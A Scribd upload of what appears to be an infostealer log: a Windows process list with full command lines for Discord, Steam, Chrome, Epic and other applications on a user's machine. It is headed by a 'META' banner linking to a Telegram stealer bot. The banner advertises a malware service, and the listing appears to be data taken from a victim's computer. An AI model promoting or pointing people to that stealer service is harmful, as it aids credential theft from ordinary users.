Scribd
Upload
43 views15 pages

Process List

The document lists process information from a Windows system. It includes the process ID, name, and command line for each running process such as explorer.exe, Discord, Steam, and others.

Uploaded by

blackcaliber44
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
43 views15 pages

Process List

The document lists process information from a Windows system. It includes the process ID, name, and command line for each running process such as explorer.exe, Discord, Steam, and others.

Uploaded by

blackcaliber44
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 15

***********************************************

* _ _ _ _ *
* / \ / \ / \ / \ *
* ( M | E | T | A ) *
* \_/ \_/ \_/ \_/ *
* *
* Telegram: https://t.me/metastealer_bot *
***********************************************

ID: 740, Name: csrss.exe, CommandLine:


===============
ID: 832, Name: winlogon.exe, CommandLine: winlogon.exe
===============
ID: 996, Name: fontdrvhost.exe, CommandLine: "fontdrvhost.exe"
===============
ID: 1180, Name: dwm.exe, CommandLine: "dwm.exe"
===============
ID: 3280, Name: gameinputsvc.exe, CommandLine: "C:\Program Files (x86)\Microsoft
GameInput\x64\gameinputsvc.exe" Global\GameInputSession_1
===============
ID: 792, Name: RpcDND_Console.exe, CommandLine: "C:\Program Files (x86)\RemotePC\
RpcDND_Console.exe"
===============
ID: 1300, Name: sihost.exe, CommandLine: sihost.exe
===============
ID: 6992, Name: uihost.exe, CommandLine: "C:\Program Files\McAfee\WebAdvisor\
UIHost.exe"
===============
ID: 7000, Name: svchost.exe, CommandLine: C:\WINDOWS\system32\svchost.exe -k
UnistackSvcGroup -s CDPUserSvc
===============
ID: 6728, Name: svchost.exe, CommandLine: C:\WINDOWS\system32\svchost.exe -k
UnistackSvcGroup -s WpnUserService
===============
ID: 5532, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-
A59CA119A75E}
===============
ID: 5216, Name: WiseMemoryOptimzer.exe, CommandLine: "C:\Program Files\Wise\Wise
Memory Optimizer\WiseMemoryOptimzer.exe" -a
===============
ID: 3168, Name: ctfmon.exe, CommandLine: "ctfmon.exe"
===============
ID: 5964, Name: explorer.exe, CommandLine: C:\WINDOWS\Explorer.EXE
===============
ID: 6452, Name: igfxEM.exe, CommandLine: "C:\WINDOWS\System32\DriverStore\
FileRepository\cui_dch.inf_amd64_38cfab2b652e4701\igfxEM.exe"
===============
ID: 7264, Name: svchost.exe, CommandLine: C:\WINDOWS\system32\svchost.exe -k
ClipboardSvcGroup -p -s cbdhsvc
===============
ID: 6592, Name: DSATray.exe, CommandLine: "C:\Program Files (x86)\Intel\Driver and
Support Assistant\DSATray.exe"
===============
ID: 8048, Name: TextInputHost.exe, CommandLine: "C:\WINDOWS\SystemApps\
MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -
ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
===============
ID: 7928, Name: StartMenuExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\
StartMenuExperienceHost.exe" -
ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
===============
ID: 4692, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 8020, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 8440, Name: dllhost.exe, CommandLine: C:\WINDOWS\system32\DllHost.exe
/Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
===============
ID: 8656, Name: svchost.exe, CommandLine: C:\WINDOWS\system32\svchost.exe -k
UnistackSvcGroup
===============
ID: 8600, Name: SecurityHealthSystray.exe, CommandLine: "C:\Windows\System32\
SecurityHealthSystray.exe"
===============
ID: 8552, Name: RtkAudUService64.exe, CommandLine: "C:\Windows\System32\
RtkAudUService64.exe" -background
===============
ID: 9256, Name: IGCCTray.exe, CommandLine: "C:\Program Files\WindowsApps\
AppUp.IntelGraphicsExperience_1.100.3408.0_x64__8j3eq9eme6ctt\
GCP.ML.BackgroundSysTray\IGCCTray.exe"
===============
ID: 9424, Name: Discord.exe, CommandLine: "C:\Users\usuario\AppData\Local\Discord\
app-1.0.9012\Discord.exe"
===============
ID: 8776, Name: Discord.exe, CommandLine: C:\Users\usuario\AppData\Local\Discord\
app-1.0.9012\Discord.exe --type=crashpad-handler --user-data-dir=C:\Users\usuario\
AppData\Roaming\discord /prefetch:7 --no-rate-limit --monitor-self-
annotation=ptype=crashpad-handler --database=C:\Users\usuario\AppData\Roaming\
discord\Crashpad --url=https://sentry.io/api/146342/minidump/?
sentry_key=384ce4413de74fe0be270abe03b2b35a "--annotation=_companyName=Discord
Inc." --annotation=_productName=Discord --annotation=_version=1.0.9012 --
annotation=plat=Win32 --annotation=prod=Electron --annotation=ver=22.3.2 --initial-
client-data=0x4b0,0x4b4,0x4b8,0x4ac,0x4bc,0x84aef78,0x84aef88,0x84aef94
===============
ID: 11204, Name: esrv.exe, CommandLine: "C:\Program Files\Intel\SUR\QUEENCREEK\x64\
esrv.exe" "--start" "--start_options_handle" "1060"
===============
ID: 10100, Name: Discord.exe, CommandLine: "C:\Users\usuario\AppData\Local\Discord\
app-1.0.9012\Discord.exe" --type=gpu-process --user-data-dir="C:\Users\usuario\
AppData\Roaming\discord" --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAA
AAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAA
AOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-
handle=1768 --field-trial-
handle=1740,i,1118569064329134349,5127168284832122066,131072 --disable-
features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
s,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
===============
ID: 11324, Name: Discord.exe, CommandLine: "C:\Users\usuario\AppData\Local\Discord\
app-1.0.9012\Discord.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=es-419 --service-sandbox-type=none --user-
data-dir="C:\Users\usuario\AppData\Roaming\discord" --mojo-platform-channel-
handle=2208 --field-trial-
handle=1740,i,1118569064329134349,5127168284832122066,131072 --disable-
features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
s,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
===============
ID: 12112, Name: Discord.exe, CommandLine: "C:\Users\usuario\AppData\Local\Discord\
app-1.0.9012\Discord.exe" --type=renderer --user-data-dir="C:\Users\usuario\
AppData\Roaming\discord" --app-user-model-id=com.squirrel.Discord.Discord --app-
path="C:\Users\usuario\AppData\Local\Discord\app-1.0.9012\resources\app.asar" --no-
sandbox --no-zygote --autoplay-policy=no-user-gesture-required --lang=es-419 --
device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --time-ticks-
at-unix-epoch=-1681672099186086 --launch-time-ticks=393149627 --mojo-platform-
channel-handle=3352 --field-trial-
handle=1740,i,1118569064329134349,5127168284832122066,131072 --disable-
features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
s,WinRetrieveSuggestionsOnlyOnDemand --enable-node-leakage-in-renderers /prefetch:1
===============
ID: 6300, Name: Discord.exe, CommandLine: "C:\Users\usuario\AppData\Local\Discord\
app-1.0.9012\Discord.exe" --type=utility --utility-sub-
type=audio.mojom.AudioService --lang=es-419 --service-sandbox-type=audio --user-
data-dir="C:\Users\usuario\AppData\Roaming\discord" --mojo-platform-channel-
handle=3792 --field-trial-
handle=1740,i,1118569064329134349,5127168284832122066,131072 --disable-
features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
s,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
===============
ID: 13216, Name: lghub.exe, CommandLine: C:\Program Files\LGHUB\lghub.exe
===============
ID: 8544, Name: lghub_system_tray.exe, CommandLine: "C:\Program Files\LGHUB\
system_tray\lghub_system_tray.exe" --background
===============
ID: 5536, Name: lghub.exe, CommandLine: "C:\Program Files\LGHUB\lghub.exe" --
type=gpu-process --user-data-dir="C:\Users\usuario\AppData\Roaming/lghub" --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAA
AOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-
handle=1816 --field-trial-
handle=2108,i,13892160948214354924,12434179736336477570,131072 --disable-
features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand
/prefetch:2
===============
ID: 6284, Name: lghub.exe, CommandLine: "C:\Program Files\LGHUB\lghub.exe" --
type=utility --utility-sub-type=network.mojom.NetworkService --lang=es-419 --
service-sandbox-type=none --user-data-dir="C:\Users\usuario\AppData\Roaming/lghub"
--mojo-platform-channel-handle=1984 --field-trial-
handle=2108,i,13892160948214354924,12434179736336477570,131072 --disable-
features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand
/prefetch:8
===============
ID: 9780, Name: unsecapp.exe, CommandLine: C:\WINDOWS\system32\wbem\unsecapp.exe -
Embedding
===============
ID: 11260, Name: lghub.exe, CommandLine: "C:\Program Files\LGHUB\lghub.exe" --
type=crashpad-handler --user-data-dir=C:\Users\usuario\AppData\Roaming/lghub
/prefetch:7 --no-rate-limit --monitor-self-annotation=ptype=crashpad-handler --
database=C:\Users\usuario\AppData\Roaming/lghub\Crashpad
--url=https://sentry.io/api/1781306/minidump/?
sentry_key=1acfc2df38074a0f9dcec78020cd4653 "--annotation=_productName=G HUB" --
annotation=_version=2023.3.396302 --annotation=plat=Win64 --
annotation=prod=Electron "--
annotation=sentry___initialScope={\"release\":\"2023.3\",\"environment\":\"Developm
ent\"}" --annotation=ver=20.0.0 --initial-client-
data=0xdac,0xdb0,0xdbc,0xdb8,0xdc0,0x7ff775e89828,0x7ff775e89838,0x7ff775e89848
===============
ID: 12176, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 12532, Name: steam.exe, CommandLine: "C:\Program Files (x86)\Steam\steam.exe"
-- "steam://rungameid/291550"
===============
ID: 12572, Name: steamwebhelper.exe, CommandLine: "C:\Program Files (x86)\Steam\
bin\cef\cef.win7x64\steamwebhelper.exe" "-lang=es_ES" "-cachedir=C:\Users\usuario\
AppData\Local\Steam\htmlcache" "-steampid=12532" "-buildid=1679680416" "-steamid=0"
"-logdir=C:\Program Files (x86)\Steam\logs" "-steamuniverse=Public" "-realm=Global"
"-clientui=C:\Program Files (x86)\Steam\clientui" --enable-media-stream --enable-
smooth-scrolling --enable-direct-write "--log-file=C:\Program Files (x86)\Steam\
logs\cef_log.txt" --disable-quick-menu --disable-features=SameSiteByDefaultCookies
--enable-blink-features=ResizeObserver,Worklet,AudioWorklet --disable-blink-
features=Badging
===============
ID: 8688, Name: steamwebhelper.exe, CommandLine: "C:\Program Files (x86)\Steam\bin\
cef\cef.win7x64\steamwebhelper.exe" --type=crashpad-handler /prefetch:7 --max-
uploads=5 --max-db-size=20 --max-db-age=5 --monitor-self-annotation=ptype=crashpad-
handler "--database=C:\Program Files (x86)\Steam\dumps" "--metrics-dir=C:\Users\
usuario\AppData\Local\CEF\User Data" --url=https://crash.steampowered.com/submit --
annotation=platform=win64 --annotation=product=cefwebhelper --
annotation=version=1679680416 --initial-client-
data=0x3ac,0x3b0,0x3b4,0x388,0x3b8,0x7ffc934ff070,0x7ffc934ff080,0x7ffc934ff090
===============
ID: 1464, Name: steamwebhelper.exe, CommandLine: "C:\Program Files (x86)\Steam\bin\
cef\cef.win7x64\steamwebhelper.exe" --type=gpu-process --field-trial-
handle=1716,16658556173608391926,11029575220954241214,131072 --enable-
features=CastMediaRouteProvider --disable-features=SameSiteByDefaultCookies --log-
file="C:\Program Files (x86)\Steam\logs\cef_log.txt" --product-version="Valve Steam
Client" --lang=es-AR --buildid=1679680416 --steamid=0 --gpu-
preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQ
AAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAA
AGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Program Files
(x86)\Steam\logs\cef_log.txt" --mojo-platform-channel-handle=1724 /prefetch:2
===============
ID: 11336, Name: steamwebhelper.exe, CommandLine: "C:\Program Files (x86)\Steam\
bin\cef\cef.win7x64\steamwebhelper.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --field-trial-
handle=1716,16658556173608391926,11029575220954241214,131072 --enable-
features=CastMediaRouteProvider --disable-features=SameSiteByDefaultCookies --
lang=es-419 --service-sandbox-type=network --log-file="C:\Program Files (x86)\
Steam\logs\cef_log.txt" --product-version="Valve Steam Client" --lang=es-AR --
buildid=1679680416 --steamid=0 --log-file="C:\Program Files (x86)\Steam\logs\
cef_log.txt" --mojo-platform-channel-handle=1592 /prefetch:8
===============
ID: 12400, Name: steamwebhelper.exe, CommandLine: "C:\Program Files (x86)\Steam\
bin\cef\cef.win7x64\steamwebhelper.exe" --type=renderer --log-file="C:\Program
Files (x86)\Steam\logs\cef_log.txt" --field-trial-
handle=1716,16658556173608391926,11029575220954241214,131072 --enable-
features=CastMediaRouteProvider --disable-features=SameSiteByDefaultCookies --
enable-blink-features=ResizeObserver,Worklet,AudioWorklet --disable-blink-
features=Badging --lang=es-419 --log-file="C:\Program Files (x86)\Steam\logs\
cef_log.txt" --product-version="Valve Steam Client" --buildid=1679680416 --
steamid=0 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --
mojo-platform-channel-handle=2512 /prefetch:1
===============
ID: 9524, Name: steamwebhelper.exe, CommandLine: "C:\Program Files (x86)\Steam\bin\
cef\cef.win7x64\steamwebhelper.exe" --type=renderer --log-file="C:\Program Files
(x86)\Steam\logs\cef_log.txt" --field-trial-
handle=1716,16658556173608391926,11029575220954241214,131072 --enable-
features=CastMediaRouteProvider --disable-features=SameSiteByDefaultCookies --
enable-blink-features=ResizeObserver,Worklet,AudioWorklet --disable-blink-
features=Badging --lang=es-419 --log-file="C:\Program Files (x86)\Steam\logs\
cef_log.txt" --product-version="Valve Steam Client" --buildid=1679680416 --
steamid=0 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --
mojo-platform-channel-handle=2876 /prefetch:1
===============
ID: 11788, Name: steamwebhelper.exe, CommandLine: "C:\Program Files (x86)\Steam\
bin\cef\cef.win7x64\steamwebhelper.exe" --type=renderer --log-file="C:\Program
Files (x86)\Steam\logs\cef_log.txt" --field-trial-
handle=1716,16658556173608391926,11029575220954241214,131072 --enable-
features=CastMediaRouteProvider --disable-features=SameSiteByDefaultCookies --
enable-blink-features=ResizeObserver,Worklet,AudioWorklet --disable-blink-
features=Badging --lang=es-419 --log-file="C:\Program Files (x86)\Steam\logs\
cef_log.txt" --product-version="Valve Steam Client" --buildid=1679680416 --
steamid=0 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --
mojo-platform-channel-handle=3288 /prefetch:1
===============
ID: 15064, Name: ApplicationFrameHost.exe, CommandLine: C:\WINDOWS\system32\
ApplicationFrameHost.exe -Embedding
===============
ID: 14624, Name: RtkUWP.exe, CommandLine: "C:\Program Files\WindowsApps\
RealtekSemiconductorCorp.RealtekAudioControl_1.2.175.0_x64__dt26b99r8h8gj\
RtkUWP.exe" -ServerName:App.AppX2vzv616czv2j97f46vn25b5ksjvhr8z1.mca
===============
ID: 15168, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9828, Name: dllhost.exe, CommandLine: C:\WINDOWS\system32\DllHost.exe
/Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
===============
ID: 9020, Name: SearchApp.exe, CommandLine: "C:\WINDOWS\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:ShellFeedsUI.AppX88fpyyrd21w8wqe62wzsjh5agex7tf1e.mca
===============
ID: 14956, Name: ShellExperienceHost.exe, CommandLine: "C:\WINDOWS\SystemApps\
ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -
ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
===============
ID: 7424, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9528, Name: steamwebhelper.exe, CommandLine: "C:\Program Files (x86)\Steam\bin\
cef\cef.win7x64\steamwebhelper.exe" --type=utility --utility-sub-
type=audio.mojom.AudioService --field-trial-
handle=1716,16658556173608391926,11029575220954241214,131072 --enable-
features=CastMediaRouteProvider --disable-features=SameSiteByDefaultCookies --
lang=es-419 --service-sandbox-type=audio --log-file="C:\Program Files (x86)\Steam\
logs\cef_log.txt" --product-version="Valve Steam Client" --lang=es-AR --
buildid=1679680416 --steamid=0 --log-file="C:\Program Files (x86)\Steam\logs\
cef_log.txt" --mojo-platform-channel-handle=3708 /prefetch:8
===============
ID: 4064, Name: Microsoft.Photos.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.Windows.Photos_2022.30070.26007.0_x64__8wekyb3d8bbwe\
Microsoft.Photos.exe" -ServerName:App.AppXzst44mncqdg84v7sv6p7yznqwssy6f7f.mca
===============
ID: 3692, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 15820, Name: CompPkgSrv.exe, CommandLine: C:\Windows\System32\CompPkgSrv.exe -
Embedding
===============
ID: 18868, Name: rundll32.exe, CommandLine: "C:\WINDOWS\system32\rundll32.exe" -
localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617
===============
ID: 14532, Name: SearchApp.exe, CommandLine: "C:\WINDOWS\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
===============
ID: 13724, Name: steamwebhelper.exe, CommandLine: "C:\Program Files (x86)\Steam\
bin\cef\cef.win7x64\steamwebhelper.exe" --type=renderer --log-file="C:\Program
Files (x86)\Steam\logs\cef_log.txt" --field-trial-
handle=1716,16658556173608391926,11029575220954241214,131072 --enable-
features=CastMediaRouteProvider --disable-features=SameSiteByDefaultCookies --
enable-blink-features=ResizeObserver,Worklet,AudioWorklet --disable-blink-
features=Badging --lang=es-419 --log-file="C:\Program Files (x86)\Steam\logs\
cef_log.txt" --product-version="Valve Steam Client" --buildid=1679680416 --
steamid=0 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --
mojo-platform-channel-handle=3204 /prefetch:1
===============
ID: 5004, Name: lghub_agent.exe, CommandLine: "C:\Program Files\LGHUB\
lghub_agent.exe"
===============
ID: 1188, Name: logi_crashpad_handler.exe, CommandLine: "C:\Program Files\LGHUB\
logi_crashpad_handler.exe" --no-rate-limit --database=C:\Users\usuario\AppData\
Local\LGHUB\sentry_db_lghub_agent --metrics-dir=C:\Users\usuario\AppData\Local\
LGHUB\sentry_db_lghub_agent --url=https://sentry.io:443/api/1779200/minidump/?
sentry_client=sentry.native/0.4.14&sentry_key=91ca51384751442380bd8987a6be91ab --
attachment=C:\ProgramData\LGHUB\installation.json --attachment=C:\ProgramData\
LGHUB\next.json --attachment=C:\ProgramData\LGHUB\current.json --attachment=C:\
Users\usuario\AppData\Local\LGHUB\settings.db --attachment=C:\Users\usuario\
AppData\Local\LGHUB\sentry_db_lghub_agent\e42647a0-0987-456d-1d51-be60b6731bb4.run\
__sentry-event --attachment=C:\Users\usuario\AppData\Local\LGHUB\
sentry_db_lghub_agent\e42647a0-0987-456d-1d51-be60b6731bb4.run\__sentry-breadcrumb1
--attachment=C:\Users\usuario\AppData\Local\LGHUB\sentry_db_lghub_agent\e42647a0-
0987-456d-1d51-be60b6731bb4.run\__sentry-breadcrumb2 --initial-client-
data=0x908,0x910,0x914,0x8dc,0x900,0x7ff702c8b4d0,0x7ff702c8b4f0,0x7ff702c8b508
===============
ID: 6632, Name: EpicGamesLauncher.exe, CommandLine: "C:\Program Files (x86)\Epic
Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe"
===============
ID: 22852, Name: EpicWebHelper.exe, CommandLine: "C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/Win64/EpicWebHelper.exe" --type=gpu-process --field-
trial-handle=2028,3678894215680697791,11844017225311339794,131072 --disable-
features=CalculateNativeWinOcclusion --no-sandbox --locales-dir-path="C:/Program
Files (x86)/Epic
Games/Launcher/Engine/Binaries/ThirdParty/CEF3/Win64/Resources/locales" --log-
file=C:/Users/usuario/AppData/Local/EpicGamesLauncher/Saved/Logs/cef3.log --log-
severity=warning --resources-dir-path="C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/ThirdParty/CEF3/Win64/Resources" --user-agent-
product="EpicGamesLauncher/14.7.1-24660660+++Portal+Release-Live
UnrealEngine/4.27.0-24660660+++Portal+Release-Live Chrome/90.0.4430.212" --lang=es-
MX --gpu-
preferences=SAAAAAAAAADgACAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAA
AAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIA
AAAAAAAAAgAAAAAAAAA
--log-file=C:/Users/usuario/AppData/Local/EpicGamesLauncher/Saved/Logs/cef3.log --
mojo-platform-channel-handle=2084 /prefetch:2
===============
ID: 23864, Name: EpicWebHelper.exe, CommandLine: "C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/Win64/EpicWebHelper.exe" --type=utility --utility-
sub-type=network.mojom.NetworkService --field-trial-
handle=2028,3678894215680697791,11844017225311339794,131072 --disable-
features=CalculateNativeWinOcclusion --lang=es-419 --service-sandbox-type=none --
no-sandbox --locales-dir-path="C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/ThirdParty/CEF3/Win64/Resources/locales" --log-
file=C:/Users/usuario/AppData/Local/EpicGamesLauncher/Saved/Logs/cef3.log --log-
severity=warning --resources-dir-path="C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/ThirdParty/CEF3/Win64/Resources" --user-agent-
product="EpicGamesLauncher/14.7.1-24660660+++Portal+Release-Live
UnrealEngine/4.27.0-24660660+++Portal+Release-Live Chrome/90.0.4430.212" --lang=es-
MX --log-file=C:/Users/usuario/AppData/Local/EpicGamesLauncher/Saved/Logs/cef3.log
--mojo-platform-channel-handle=2592 /prefetch:8
===============
ID: 24212, Name: EpicWebHelper.exe, CommandLine: "C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/Win64/EpicWebHelper.exe" --type=renderer --no-
sandbox --log-file=C:/Users/usuario/AppData/Local/EpicGamesLauncher/Saved/Logs/
cef3.log --field-trial-handle=2028,3678894215680697791,11844017225311339794,131072
--disable-features=CalculateNativeWinOcclusion --lang=es-419 --locales-dir-
path="C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/ThirdParty/CEF3/Win64/Resources/locales" --log-
file=C:/Users/usuario/AppData/Local/EpicGamesLauncher/Saved/Logs/cef3.log --log-
severity=warning --resources-dir-path="C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/ThirdParty/CEF3/Win64/Resources" --user-agent-
product="EpicGamesLauncher/14.7.1-24660660+++Portal+Release-Live
UnrealEngine/4.27.0-24660660+++Portal+Release-Live Chrome/90.0.4430.212" --device-
scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-
code-mitigations --mojo-platform-channel-handle=2744 /prefetch:1
===============
ID: 24220, Name: EpicWebHelper.exe, CommandLine: "C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/Win64/EpicWebHelper.exe" --type=renderer --no-
sandbox --log-file=C:/Users/usuario/AppData/Local/EpicGamesLauncher/Saved/Logs/
cef3.log --field-trial-handle=2028,3678894215680697791,11844017225311339794,131072
--disable-features=CalculateNativeWinOcclusion --lang=es-419 --locales-dir-
path="C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/ThirdParty/CEF3/Win64/Resources/locales" --log-
file=C:/Users/usuario/AppData/Local/EpicGamesLauncher/Saved/Logs/cef3.log --log-
severity=warning --resources-dir-path="C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/ThirdParty/CEF3/Win64/Resources" --user-agent-
product="EpicGamesLauncher/14.7.1-24660660+++Portal+Release-Live
UnrealEngine/4.27.0-24660660+++Portal+Release-Live Chrome/90.0.4430.212" --device-
scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-
code-mitigations --mojo-platform-channel-handle=2752 /prefetch:1
===============
ID: 22632, Name: PhoneExperienceHost.exe, CommandLine: "C:\Program Files\
WindowsApps\Microsoft.YourPhone_1.22092.211.0_x64__8wekyb3d8bbwe\
PhoneExperienceHost.exe" -ComServer:Background -Embedding
===============
ID: 30600, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --profile-directory="Profile 4"
===============
ID: 32296, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\usuario\
AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-
annotation=ptype=crashpad-handler "--database=C:\Users\usuario\AppData\Local\
Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\usuario\AppData\Local\
Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --
annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --
annotation=ver=107.0.5304.108 --initial-client-
data=0x110,0x114,0x118,0xec,0xc,0x7ffc1b949e68,0x7ffc1b949e78,0x7ffc1b949e88
===============
ID: 31804, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=gpu-process --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAA
AAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAA
AOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-
handle=1692 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:2
===============
ID: 31156, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=es-419 --service-sandbox-type=none --mojo-
platform-channel-handle=1936 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:8
===============
ID: 32112, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-
type=storage.mojom.StorageService --lang=es-419 --service-sandbox-type=utility --
mojo-platform-channel-handle=2284 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:8
===============
ID: 30968, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=renderer --display-capture-permissions-policy-
allowed --first-renderer-process --lang=es-419 --device-scale-factor=1 --num-
raster-threads=1 --renderer-client-id=6 --time-ticks-at-unix-epoch=-
1681672103653583 --launch-time-ticks=256085560677 --mojo-platform-channel-
handle=3220 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:1
===============
ID: 32748, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=renderer --extension-process --display-capture-
permissions-policy-allowed --lang=es-419 --device-scale-factor=1 --num-raster-
threads=1 --renderer-client-id=7 --time-ticks-at-unix-epoch=-1681672103653583 --
launch-time-ticks=256086652253 --mojo-platform-channel-handle=4528 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:1
===============
ID: 18472, Name: cmd.exe, CommandLine: C:\WINDOWS\system32\cmd.exe /d /c "C:\
Program Files\McAfee\WebAdvisor\BrowserHost.exe"
chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/ --parent-window=0 < \\.\pipe\
chrome.nativeMessaging.in.f6a8ba1a88dfcd5a > \\.\pipe\
chrome.nativeMessaging.out.f6a8ba1a88dfcd5a
===============
ID: 31964, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 28668, Name: cmd.exe, CommandLine: C:\WINDOWS\system32\cmd.exe /d /c "C:\
Program Files\McAfee\WebAdvisor\BrowserHost.exe"
